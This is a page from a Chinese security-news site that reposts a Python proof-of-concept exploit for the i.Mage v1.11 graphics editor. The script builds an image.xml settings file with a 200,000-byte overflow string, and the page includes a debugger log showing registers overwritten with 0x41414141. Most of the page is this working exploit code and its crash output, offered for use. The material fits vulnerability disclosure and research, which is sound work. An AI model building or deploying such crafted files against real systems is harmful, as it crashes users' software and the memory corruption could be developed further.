首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
i.Mage Local Crash Proof of Concept Exploit
来源:twitter.com/m3tac0m 作者:metacom 发布时间:2014-11-11  
#!/usr/bin/python
#Exploit Title:i.Mage Local Crash Poc
#Version:i.Mage v1.11 (Win32 Release)
#Description:i.Mage is a small and fast graphics editor slanted towards quite and easy pixel editing...
#Tested on:Win7 32bit EN-Ultimate 
#Exploit Author:metacom  --> twitter.com/m3tac0m
#Date:26.10.2014
'''
Immunity Debugger Log data
Address=77B85FBD
Message=[17:21:47] Access violation when reading [41414145]
  
EAX 01354078 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 41414141
EDX 41414141
EBX 01374F10
ESP 0012F810
EBP 0012F838
ESI 01354070 ASCII "AAAzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 003A0000
EIP 77B85FBD ntdll.77B85FBD'''
print "\n[*]Vulnerable Created image.xml!"
print "[*]Copy image.xml to C:\Program Files\Memecode\i.Mage"
print "[*]Start i.Mage"
print "[*]------------------------------------------------"
  
poc="\x41" * 200000
header  = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x20\x45\x72\x61\x73\x65\x57\x69\x64\x74\x68\x3d"
header += "\x22\x31\x30\x22\x0a\x09\x20\x45\x72\x61\x73\x65\x41\x6d\x6f\x75\x6e\x74\x3d\x22\x32\x35\x35\x22\x0a\x09\x20\x44\x73\x70"
header += "\x47\x72\x69\x64\x3d\x22\x31\x22\x0a\x09\x20\x54\x6f\x6f\x6c\x4f\x70\x65\x6e\x3d\x22\x30\x22\x0a\x09\x20\x41\x6e\x67\x6c"
header += "\x65\x3d\x22\x30\x22\x0a\x09\x20\x50\x6f\x73\x3d\x22\x37\x31\x37\x2c\x33\x34\x30\x2c\x31\x31\x31\x37\x2c\x36\x34\x30\x22"
header += "\x0a\x09\x20\x45\x6e\x61\x62\x6c\x65\x64\x55\x6e\x64\x6f\x3d\x22\x31\x22\x0a\x09\x20\x46\x69\x6c\x6c\x4f\x62\x6a\x65\x63"
header += "\x74\x73\x3d\x22\x31\x22\x0a\x09\x20\x54\x72\x61\x6e\x73\x70\x61\x72\x65\x6e\x74\x50\x61\x73\x74\x65\x3d\x22\x30\x22\x0a"
header += "\x09\x20\x4f\x70\x65\x72\x61\x74\x6f\x72\x3d\x22\x30\x22\x0a\x09\x20\x41\x6c\x70\x68\x61\x3d\x22\x32\x35\x35\x22\x0a\x09"
header += "\x20\x53\x70\x6c\x69\x74\x74\x65\x72\x50\x6f\x73\x3d\x22\x32\x35\x30\x22\x3e\x0a\x09\x3c\x4d\x72\x75\x20\x49\x74\x65\x6d"
header += "\x73\x3d\x22\x30\x22\x0a\x09\x09\x20\x49\x74\x65\x6d\x30\x3d\x22\x0a" + poc
  
footer = "\x22\x20\x2f\x3e\x0a\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x3e\x0a"
  
payload=header + footer
writeFile = open ("image.xml", "w")
writeFile.write( payload )
writeFile.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·i.Hex Local Crash Proof of Con
·Citrix NetScaler SOAP Handler
·i-FTP Buffer Overflow SEH Expl
·Belkin n750 jump login Paramet
·X7 Chat 2.0.5 lib/message.php
·PicsArt Photo Studio For Andro
·Linux/x86 Add map in /etc/host
·ManageEngine Eventlog Analyzer
·Linux Local Root => 2.6.39 (32
·tnftp "savefile" Arbitrary Com
·Drupal < 7.32 Pre Auth SQL Inj
·Visual Mining NetCharts Server
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved